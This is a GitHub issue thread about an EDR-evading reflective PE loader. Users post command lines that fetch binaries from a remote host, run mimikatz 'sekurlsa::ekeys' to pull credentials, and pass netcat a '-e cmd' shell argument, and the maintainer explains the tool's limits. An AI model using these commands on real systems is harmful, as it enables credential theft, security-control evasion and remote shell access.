cpu0x00 / SharpReflectivePEInjection

reflectively load and execute PEs locally and remotely bypassing EDR hooks
151 stars 26 forks source link

Use remote loading to execute net.exe user,Example does not work #2

Open ciacybers opened 6 months ago

ciacybers commented 6 months ago

SharpReflectivePEInjection.exe -u http://10.10.10.10/exe.exe [Optional: -Args "sekurlsa::ekeys exit"] -ComputerName server.local

cpu0x00 commented 6 months ago

yeaaah , i found out that nearly every windows release has a different net.exe version so the you're trying to load will probably be different than the one should be executed on the target

awesome how microsoft managed to make simple net.exe really missed up like this LOL

ciacybers commented 6 months ago

But how should I bring commands when using other .net tools, such as nc.exe SharpReflectivePEInjection.exe -u http://10.10.10.10/nc.exe -Args "127.0.0.1 8888 -e cmd" This command does not seem to work. Is there any way to solve it?

cpu0x00 commented 6 months ago

i noticed you said .Net tools , i don't think NetCat is .Net and i don't know if there is a .net variation of it , however the project is not intended to load .Net tooling it focuses on unmanaged binaries like C++/C binaries , also NetCat is long living process in the sense that it keeps listening for connections and the tool reflectively loads and executes a binary and then waits to return output from it or closes if there is no output or errors , tbh i didn't build it with a consideration for a long living process as generally only execute and retrieve is needed , something like mimikatz, but please share the error you recieved when trying to run nc.exe with the tool to see what happens when it executed